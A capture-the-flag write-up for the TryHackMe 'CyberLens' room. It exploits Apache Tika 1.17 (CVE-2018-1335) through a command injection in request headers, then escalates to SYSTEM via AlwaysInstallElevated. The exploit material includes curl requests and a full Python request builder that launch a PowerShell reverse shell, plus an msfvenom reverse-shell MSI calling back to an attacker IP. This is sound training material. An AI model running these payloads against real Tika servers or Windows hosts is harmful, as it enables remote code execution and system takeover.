# CyberLens

{% embed url="<https://tryhackme.com/r/room/cyberlensp6>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with an Nmap scan and find several open ports on the system, including the usual Windows services: Microsoft RPC (135/tcp), NetBIOS (139/tcp), Microsoft-DS/SMB (445/tcp), Remote Desktop Protocol (3389/tcp) and Windows Remote Management (5985/tcp and 47001/tcp). Several high ports (49664/tcp to 49670/tcp and 49677/tcp) are open as well; Nmap could not name their services on this first pass, but in that range they are typically RPC dynamic endpoints. Finally, there is a web server on port 80.

<figure><img src="/files/dEiNUNrLeUAb7krdCqF0" alt=""><figcaption></figcaption></figure>

A subsequent default-script and version scan (`-sC -sV`) gives us more details: there is not only a web server on port 80 but also one on port 61777.

<figure><img src="/files/q5kKBzKJxJYArkCpTKtr" alt=""><figcaption></figcaption></figure>

Let's take a look at the page on port 80 first. It is a single-page site.

<figure><img src="/files/MCqAlFRSMCIKFQNqH5oc" alt=""><figcaption></figcaption></figure>

There is a contact form, but a handful of XSS payloads submitted through it did not fire anywhere.

<figure><img src="/files/eUUBooALRcJERfHx4t8D" alt=""><figcaption></figcaption></figure>

Scrolling further, we find an upload form that extracts metadata from images. The first ideas were a plain reverse-shell upload, an ImageMagick exploit, and a reverse shell embedded in the image metadata with exiftool. None of them worked.

<figure><img src="/files/MO8xAcbw31QGWwkD8KIg" alt=""><figcaption></figcaption></figure>

Looking at the page source, we find that the form talks to an endpoint on port `61777`. That is where we may be able to make progress, but let's first look at the request in Burp.

<figure><img src="/files/rwrUO3l4c6SU9mMT0Hrk" alt=""><figcaption></figcaption></figure>

The `61777` endpoint is responsible for metadata extraction.

<figure><img src="/files/Hr1D0AQ7PBecIWJlnTKM" alt=""><figcaption></figcaption></figure>

Visiting the index page of that endpoint hands us the product and version straight away: we are dealing with `Apache Tika 1.17`. That is enough to look for known vulnerabilities.

<figure><img src="/files/9nocHuoR4WVcHEuebosN" alt=""><figcaption></figcaption></figure>

This machine is vulnerable to `CVE-2018-1335`.

{% embed url="<https://nvd.nist.gov/vuln/detail/CVE-2018-1335>" %}

## Shell as cyberlens

A short Searchsploit query turns up two PoCs that implement the command injection and match our version. The first hit is a Metasploit module, so let's continue with that for now.

<figure><img src="/files/jRRbztwKhYguscMiBoMp" alt=""><figcaption></figcaption></figure>

### Metasploit

Searching for Tika in msfconsole shows that the module we found earlier is available in our installation. We select it and check which options have to be set.

<figure><img src="/files/HkLk95xjvEgYIUo8WCkU" alt=""><figcaption></figcaption></figure>

We set the options `LHOST`, `RHOSTS` and `RPORT` (the Tika service is on 61777, not the default 9998).

```
set LHOST 10.8.211.1
set RPORT 61777
set RHOSTS cyberlens.thm
```

<figure><img src="/files/2oUVt0j23nw225XbymrR" alt=""><figcaption></figcaption></figure>

Next, we run the exploit and get a reverse shell as `cyberlens`.

<figure><img src="/files/2v1ifqxsDCKhcLu2up50" alt=""><figcaption></figcaption></figure>

On the user's desktop, we find the user flag.

<figure><img src="/files/2iGFWkX1k9ewPSYXzcpP" alt=""><figcaption></figcaption></figure>

Using `tree /f`, we enumerate the user's profile and find their credentials under `C:\Users\CyberLens`.

<figure><img src="/files/dtGpm02tDZRwRhdHhej7" alt=""><figcaption></figcaption></figure>

### Script

CVE-2018-1335 is a command injection in tika-server (Apache Tika 1.7 to 1.17). tika-server lets a client override parser settings through `X-Tika-*` request headers, including `X-Tika-OCRTesseractPath`, the path of the tesseract binary used for OCR. That value is passed unchecked to Java's `ProcessBuilder`, so a single crafted HTTP request can point it at any executable on the server and get it run.

A detailed explanation of this vulnerability can be found at the following resource (do not miss out on that):

{% embed url="<https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/>" %}

Like the blog post, the script comes from `Rhino Security Labs` and lets us execute commands on the system.

<figure><img src="/files/0gyA4LXsOSEb6UJobDsc" alt=""><figcaption></figcaption></figure>

We use revshells.com to create a PowerShell reverse shell.

<figure><img src="/files/QOX4D7Rdcg1XcTlB0pXR" alt=""><figcaption></figcaption></figure>

We set up a listener on port `445` and fire the payload through the script...

<figure><img src="/files/IOggSF2kUpSwkzSk4Rw6" alt=""><figcaption></figcaption></figure>

... we get a connection back as `cyberlens`.

<figure><img src="/files/ARYlNYEt639mzY1VG0JT" alt=""><figcaption></figcaption></figure>

### Manually

We can also do it manually.

The exploit can be triggered by the request below, which pops a `calc.exe` on the server. That is all we get from the header on its own: Tika builds the OCR command as an argument array for Java's `ProcessBuilder`, and the header value becomes only its first element, the executable name. There is no shell in between that would split the value on spaces, so we cannot smuggle arguments or chain several commands through this one header.

```
curl -T lens.pong http://cyberlens.thm:61777/meta --header "X-Tika-OCRTesseractPath: \"calc.exe\""
```

Since we want to spawn a reverse shell, which requires more than one parameter, we need a workaround discussed in the blog and used in the script.

{% embed url="<https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/>" %}

To get arguments into the command line that tika-server builds, `X-Tika-OCRTesseractPath` is set to `"cscript.exe"` and `X-Tika-OCRLanguage` to `//E:Jscript`. Tika then invokes `cscript.exe` with the temporary copy of the uploaded "image" as the first argument and the language value further down the argument list, which `cscript.exe` reads as the script engine selector. Since the uploaded "image" actually contains JScript (or VBScript) code, `cscript.exe` executes it, and we have full script execution.

With the following cURL request we are able to pop a reverse shell.

```
curl -X PUT http://cyberlens.thm:61777/meta \
-H "X-Tika-OCRTesseractPath: \"cscript\"" \
-H "X-Tika-OCRLanguage: //E:Jscript" \
-H "Expect: 100-continue" \
-H "Content-type: image/jp2" \
-H "Connection: close" \
-d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e <BASE64_ENCODED_PAYLOAD>');"
```

<figure><img src="/files/Bgjj1EXhg3OFi6ATl3ef" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/AKrdKwRaOTXT4qUXG9iq" alt=""><figcaption></figcaption></figure>
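The same request, built step by step in Python so that each part of the chain (UTF-16LE base64 for `powershell -e`, the JScript wrapper, the two `X-Tika-*` headers, the raw `PUT /meta` on the wire) is visible and can be replayed from Burp or netcat. This is an added example for this writeup, not code from the original post nor the Rhino Security Labs script. It assumes tika-server 1.17 on `cyberlens.thm:61777` as in the writeup, a listener already waiting for the callback, and a PowerShell one-liner supplied by you; the default command is only a harmless proof of execution.

```python
"""Manual CVE-2018-1335 request builder for tika-server (added example)."""
import base64
import http.client

TARGET_HOST = "cyberlens.thm"   # hostname used in the writeup (assumed resolvable)
TARGET_PORT = 61777


def encode_powershell(command: str) -> str:
    """powershell -e expects base64 of the UTF-16LE command, not UTF-8."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def build_jscript(command: str) -> str:
    """JScript that cscript.exe runs once Tika hands it the uploaded 'image'.

    The command goes through cmd /c so pipes and redirections also work;
    backslashes and single quotes are escaped for the JScript string literal.
    """
    escaped = command.replace("\\", "\\\\").replace("'", "\\'")
    return ("var sh = WScript.CreateObject('WScript.Shell');"
            "sh.Exec('cmd /c " + escaped + "');")


def build_headers() -> dict:
    """Headers that turn Tika's tesseract invocation into a cscript invocation."""
    return {
        # argv[0] of the OCR ProcessBuilder call; quoted as in the writeup's curl request
        "X-Tika-OCRTesseractPath": '"cscript"',
        # lands in the argument list and selects the JScript engine for cscript
        "X-Tika-OCRLanguage": "//E:Jscript",
        # content type taken from the writeup's request so the upload reaches the OCR parser
        "Content-Type": "image/jp2",
        "Connection": "close",
    }


def raw_request(body: str, host: str = TARGET_HOST, port: int = TARGET_PORT) -> bytes:
    """Wire format of the PUT /meta request, for replay from Burp or netcat."""
    lines = ["PUT /meta HTTP/1.1", f"Host: {host}:{port}"]
    lines += [f"{k}: {v}" for k, v in build_headers().items()]
    lines.append(f"Content-Length: {len(body.encode())}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body.encode()


def send(body: str, host: str = TARGET_HOST, port: int = TARGET_PORT, timeout: int = 15) -> int:
    """Send the request and return the HTTP status. The shell arrives out of band,
    so a 200 or a 500 here says little about whether the command actually ran."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("PUT", "/meta", body=body.encode(), headers=build_headers())
    status = conn.getresponse().status
    conn.close()
    return status


if __name__ == "__main__":
    import sys
    # Default is a harmless proof of execution (assumed path); pass the revshells.com
    # PowerShell one-liner as argv[1] to get the callback described in the writeup.
    ps = sys.argv[1] if len(sys.argv) > 1 else "whoami | Out-File C:\\Windows\\Temp\\tika.txt"
    payload = build_jscript("powershell -nop -w hidden -e " + encode_powershell(ps))
    print(raw_request(payload).decode())
    print("status:", send(payload))
```

`raw_request` is the part worth keeping around: pasting its output into Burp Repeater makes it easy to try the `calc.exe`-only variant against the `cscript` variant and see that only the latter lets the temporary file become a script argument.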

## Shell as NT AUTHORITY\SYSTEM

To enumerate a Windows host, scripts like WinPEAS, PowerUp or PrivescCheck can be used.

{% embed url="<https://github.com/itm4n/PrivescCheck>" %}

Before dropping tooling on the box, we check whether any protection such as Windows Defender is active. `Get-MpComputerStatus` reports the Defender antimalware and real-time protection state, and here neither is enabled or running. So we are free to use any scripts and payloads, msfvenom-generated ones included, without bothering with AV evasion.

```powershell
PS C:\Users\Cyberlens> Get-MpComputerStatus
```

<figure><img src="/files/Pm2BSz181kLQA6mu1tcf" alt=""><figcaption></figcaption></figure>

With a quick run of `PrivescCheck.ps1` ...

```
. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended
```

<figure><img src="/files/gmSlB2rp90RM4sNXilS5" alt=""><figcaption></figcaption></figure>

... we see that `AlwaysInstallElevated` might be enabled. With this policy set, the Windows Installer service runs any MSI package with the privileges of the local SYSTEM account, regardless of who launched it. That lets us craft a malicious MSI whose payload executes as SYSTEM.

Once created, we only have to download and run the MSI on the victim as any user: the payload inside it runs in the context of SYSTEM. Placing a reverse shell in the MSI therefore gives us a shell as SYSTEM.

<figure><img src="/files/YbusQmnfYQWJtICL7VqD" alt=""><figcaption></figcaption></figure>

A detailed walkthrough on how to detect and exploit this misconfiguration can be looked up here:

{% embed url="<https://juggernaut-sec.com/alwaysinstallelevated/>" %}

We can confirm this through the registry. Both the HKCU and the HKLM value must be set to `1`; if only one of them is, msiexec does not install elevated. Here both are set, so the misconfiguration is real.

```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

<figure><img src="/files/PvCmpt2AxwC1SkqN1oYX" alt=""><figcaption></figcaption></figure>

We craft a simple Windows reverse shell with msfvenom, packaged as an MSI.

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.211.1 LPORT=443 -a x64 --platform Windows -f msi -o rev.msi
```

<figure><img src="/files/lkrItKFVcqCWvKYCSprd" alt=""><figcaption></figcaption></figure>

Next, we set up a listener on port 443, transfer the package to the target and run it with `msiexec`...

<figure><img src="/files/Hvxa1BdSB25qxd1avZYn" alt=""><figcaption></figcaption></figure>

... we receive a connection as `nt authority\system` and find the root flag at `C:\Users\Administrator\Desktop\admin.txt`.

<figure><img src="/files/M4nGV4X8f9RzBiASh4lB" alt=""><figcaption></figcaption></figure>

## Recommendation

Don't miss out on gravereaper2038's writeup, where he makes use of `CVE-2021-40449` to gain elevated privileges in the last section:

{% embed url="<https://manav-g-krishna.gitbook.io/tryhackme-writeups/cyberlens>" %}
